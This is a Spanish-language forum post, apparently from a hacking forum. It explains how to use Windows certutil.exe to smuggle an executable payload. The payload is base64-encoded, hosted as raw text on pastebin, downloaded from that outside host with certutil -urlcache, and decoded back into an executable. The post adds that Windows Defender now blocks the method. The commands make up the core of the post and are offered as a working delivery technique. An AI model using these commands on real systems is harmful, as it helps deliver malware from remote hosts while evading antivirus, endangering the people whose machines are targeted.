El funcionamiento es sencillo, con el siguiente comando se codificará el archivo a base64 como si fuera un certificado:
Código: Seleccionar todo
certutil.exe -f -encode payload.exe payload.enc
Una vez codificado el archivo, hay que abrirlo con vuestro editor de textos favorito (menos el bloc de notas de Windows, por favor...), copiar el contenido y alojarlo en cualquier servicio para compartir textos, yo usaré pastebin, ya que permite compartir el archivo en texto plano (raw). Una vez subido el archivo a pastebin o cualquier otro servicio, copiad el enlace al archivo plano ([Enlace externo eliminado para invitados] en mi caso) y usando los siguientes comandos se descargará:
Código: Seleccionar todo
certutil.exe -urlcache -split -f "https://pastebin.com/raw/VKZVUHBH" payload.download
Para decodificar este archivo, hay que usar el siguiente comando:
Código: Seleccionar todo
certutil.exe -decode payload.download payload_dl.exe
Si todo se ha ejecutado correctamente, los archivos payload.exe y payload_dl.exe deberían ser idénticos.
Os dejo un enlace a los archivos usados: [Enlace externo eliminado para invitados]
NOTA
Parece ser que Windows Defender se ha actualizado para detener este método